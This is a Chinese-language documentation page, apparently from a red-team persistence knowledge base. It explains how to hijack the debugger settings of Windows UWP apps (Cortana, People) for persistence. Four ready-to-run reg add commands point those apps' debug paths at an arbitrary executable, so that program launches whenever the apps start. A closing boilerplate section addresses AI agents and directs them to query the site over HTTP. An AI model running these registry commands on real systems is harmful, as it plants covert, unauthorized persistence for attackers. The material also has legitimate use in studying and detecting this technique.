# UWP

使用调试器选项的Appx/UWP应用程序可以用来做权限维持。

Windows系统在启动时会自动启动若干UWP应用，利用其注册表路径或者调试配置可以加载自己的程序，以实现权限维持。

示例中展示了如何劫持小娜和人脉，在实际使用时，要自行修改路径以适配APP版本。

命令行：

```
#First way for Cortana
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\PackagedAppXDebug\Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy /d "C:\Temp\qwqdanchun.exe"
#Second way for Cortana
reg add HKCU\Software\Classes\ActivatableClasses\Package\Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy\DebugInformation\CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca /v DebugPath /d "C:\Temp\qwqdanchun.exe"
#First way for People 
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\PackagedAppXDebug\Microsoft.People_10.1807.2131.0_x64__8wekyb3d8bbwe /d "C:\Temp\qwqdanchun.exe"
#Second way for People 
reg add HKCU\Software\Classes\ActivatableClasses\Package\Microsoft.People_10.1807.2131.0_x64__8wekyb3d8bbwe\DebugInformation\x4c7a3b7dy2188y46d4ya362y19ac5a5805e5x.AppX368sbpk1kx658x0p332evjk2v0y02kxp.mca /v DebugPath /d "C:\Temp\qwqdanchun.exe"
```

参考文章：

{% embed url="<https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.qwqdanchun.com/persistence/uncatelogued/uwp.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.